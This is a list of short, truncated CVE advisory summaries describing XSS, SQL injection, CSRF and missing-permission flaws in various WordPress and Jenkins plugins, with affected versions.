CVE-2024-12395

The WooCommerce Additional Fees On Checkout Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘number’ parameter in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated...

CVE-2024-12566

The Email Subscribers by Icegram Express WordPress plugin before 5.7.45 does not sanitise and escape some of form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in...

CVE-2024-4000

The WordPress Header Builder Plugin – Pearl plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stmhb' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possib...

CVE-2024-10175

The Pricing Tables For WPBakery Page Builder formerly Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdopricingtables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied...

CVE-2023-30521

A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository...

CVE-2023-0068

The Product GTIN EAN, UPC, ISBN for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored...

CVE-2023-2744

The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the type parameter in the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin...

CVE-2022-1904

The Pricing Tables WordPress Plugin WordPress plugin before 3.2.1 does not sanitise and escape parameter before outputting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled, leading to a Reflected Cross-Site Scripting...

CVE-2022-34208

A missing permission check in Jenkins Beaker builder Plugin 1.10 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL...

CVE-2022-34186

Jenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape the name and description of Moded Extended Choice parameters on views displaying parameters, resulting in a stored cross-site scripting XSS vulnerability exploitable by attackers with Item/Configure permission...

CVE-2022-2276

The WP Edit Menu WordPress plugin before 1.5.0 does not have authorisation and CSRF in an AJAX action, which could allow unauthenticated attackers to delete arbitrary posts/pages from the blog...

CVE-2021-24309

The "Schedule Name" input in the Weekly Schedule WordPress plugin before 3.4.3 general options did not properly sanitize input, allowing a user to inject javascript code using the...

CVE-2021-24498

The Calendar Event Multi View WordPress plugin before 1.4.01 does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page via php/edit.php, leading to a reflected Cross-Site Scripting issue...

CVE-2020-36503

The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue...

CVE-2019-16566

A missing permission check in Jenkins Team Concert Plugin 1.3.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins...

CVE-2025-1303

CVE-2025-1303 concerns the Plugin Oficial WordPress plugin (Getnet para WooCommerce) up to version 1.7.3. The issue is a reflected cross-site scripting (XSS) vulnerability caused by a parameter not being sanitised/escaped before being echoed in the page. Exploitation is described against unauthen...

CVE-2024-13053 Form Maker by 10Web < 1.15.33 - Admin+ Stored XSS via Theme Title

The Form Maker by 10Web WordPress plugin before 1.15.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup...

CVE-2024-12679

The CVE-2024-12679 affects the Prisna GWT WordPress plugin and is due to inadequate sanitisation/escaping of certain settings in versions before 1.4.14. This can enable admin-level Stored XSS even when unfiltered_html is disallowed (e.g., multisite). The impact is stored XSS with potential privil...

CVE-2024-10076 Jetpack < 13.8, Boost < 3.4.8 - Contributor+ Stored XSS

The Jetpack WordPress plugin before 13.8, Jetpack Boost WordPress plugin before 3.4.8 use regexes in the Site Accelerator features when switching image URLs to their CDN counterpart. Unfortunately, some of them may match patterns it shouldn’t, ultimately making it possible for contributor and abo...

CVE-2024-13858

The CVE-2024-13858 entry concerns the BuddyBoss Platform plugin for WordPress and BuddyBoss Theme, affected by a Stored Cross-Site Scripting via the invitee_name parameter. Affected versions are all up to 2.8.50 (platform) and 2.8.41 (theme), with insufficient input sanitization and output escapi...